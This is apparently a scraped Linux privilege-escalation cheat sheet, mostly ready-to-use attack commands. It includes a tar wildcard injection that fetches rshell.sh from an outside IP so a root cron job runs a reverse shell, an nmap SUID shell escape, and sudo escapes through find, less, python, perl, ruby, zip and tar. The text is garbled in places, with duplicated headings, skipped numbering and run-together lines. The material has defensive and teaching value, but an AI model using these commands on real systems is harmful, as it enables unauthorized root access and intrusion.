1. Kernel Exploits
1.1 Dirty Cow Exploit: https://dirtycow.ninja/
Read More
1.1 Dirty Cow Exploit: https://dirtycow.ninja/
2. Exploiting Weak Services
3.1 Wildcard Injection
Crontab :0 5 * * * root tar -zcf /var/backups/home.tgz /home/*==>. [user@localhost home]$ wget http://192.168.0.66/rshell.sh. [user@localhost home]$ touch “–checkpoint-action=exec=sh rshell.sh”. [user@localhost home]$ touch “–checkpoint=1”. <Open a listener on attack platform, wait for cronjob to execute rshell.sh.>
3.3 The Infamous SUID Executable
find directory –user root –perm –4000 –exec ls –ld {} \; >/tmp/setuid
[user@localhost home]$ nmap –interactivenmap> !sh# whoamiroot
3.4 Exploiting SUDO Users
sudo find /etc -exec sh -i \;
[user@localhost]$ sudo:shell[root@localhost]#
[user@localhost]$ sudo less file.txt!bash[root@localhost]#
[user@localhost]$ sudo more long_file.txt!bash[root@localhost]#
[user@localhost]$ sudo python -c 'import pty; pty.spawn("/bin/sh")[user@localhost]$ sudo perl -e 'exec "/bin/sh";'[user@localhost]$ sudo ruby -e 'exec "/bin/sh"'
sudo zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"
sudo tar cf /dev/null /tmp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash
4. Physical Access Attacks
4.1 LUKS Vulnerability – Enter Key to Root in 70 Seconds
